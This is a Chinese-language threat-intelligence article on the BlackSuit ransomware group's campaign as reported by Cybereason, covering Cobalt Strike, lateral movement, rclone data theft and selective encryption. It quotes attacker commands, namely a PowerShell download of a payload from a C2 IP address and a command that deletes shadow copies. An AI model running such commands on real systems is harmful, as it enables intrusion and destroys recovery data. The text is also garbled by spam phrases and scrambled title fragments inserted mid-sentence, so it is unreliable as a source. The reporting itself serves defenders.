BlackSuit：Royal/Conti改头换面重出江湖，新型勒索软件以速度、隐蔽性和数据窃取为特征

高度协同的头换特征破坏性勒索活动

Cybereason最新调查揭露，BlackSuit勒索软件组织（臭名昭著的面重Royal和Conti威胁组织的重组后继者）正在实施一场高度协同的破坏性勒索活动
。该活动融合了隐蔽性 、出江速度和精准打击能力  ，湖新和数堪称今年最复杂的型勒勒索软件攻击之一 。亿华云

Cybereason在报告中指出："BlackSuit是索软2023年年中出现的勒索软件组织，被广泛认为是速据窃Royal勒索团伙的改头换面或分支  。"

三重杀伤链攻击模式

与传统仅关注加密的度隐勒索攻击不同，BlackSuit采用三阶段杀伤链：初始入侵、模板下载蔽性数据窃取和选择性加密 ，头换特征并辅以数据删除手段破坏恢复工作。面重

攻击始于部署Cobalt Strike信标实现命令控制(C2)和横向移动
 。出江虽然初始入侵途径尚不明确 ，湖新和数但分析人员注意到早期流量来自未安装Cybereason传感器的型勒设备 ，表明系统早已被攻陷。索软

研究团队强调 ："Cobalt Strike被确认为BlackSuit勒索软件的主要攻击工具 。服务器租用"

横向移动技术组合

BlackSuit采用多种技术实现横向移动：

通过PsExec.exe在C:\Windows\Temp目录分发执行vm.dll和vm80.dll等载荷创建具有System权限的RPC服务使用Configure-SMRemoting.exe建立远程桌面连接从网络共享执行frdke23.exe等可疑二进制文件，通过rundll32.exe将代码注入wuauclt.exe等合法进程

这些技术使攻击者能在全网进行广泛侦察和载荷部署的同时保持隐蔽性。

载荷投递与执行特征

攻击者使用如下PowerShell命令下载Cobalt Strike信标
：

复制invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll1.

同一C2基础设施被用于投递最终载荷——通过重命名为b.exe和vmware.dll等文件部署BlackSuit勒索软件 。一个异常特征是执行时使用了-nomutex标志：

"与典型勒索行为不同...-nomutex标志禁用互斥体创建...允许并发多实例执行——可能是为了实现冗余、加速跨会话加密或规避基于互斥体的高防服务器检测 。"

双重勒索与破坏恢复

加密前，攻击者使用伪装成vmware.exe的rclone.exe窃取约60GB敏感数据 。这反映了双重勒索策略的流行趋势——通过预先窃取数据增加赎金压力。

为破坏系统恢复，攻击者使用vssadmin.exe删除卷影副本 ：

复制vssadmin delete shadows /all /quiet1.

随后立即执行勒索软件，仅针对特定文件类型加密
，源码库同时排除Windows、IPC$和ADMIN$等系统关键文件夹以避免业务中断 。

精心设计的加密逻辑

BlackSuit的加密逻辑针对性能和隐蔽性进行了优化 ，避免加密.exe、.dll和.BlackSuit文件 ，并投放勒索说明。

源码下载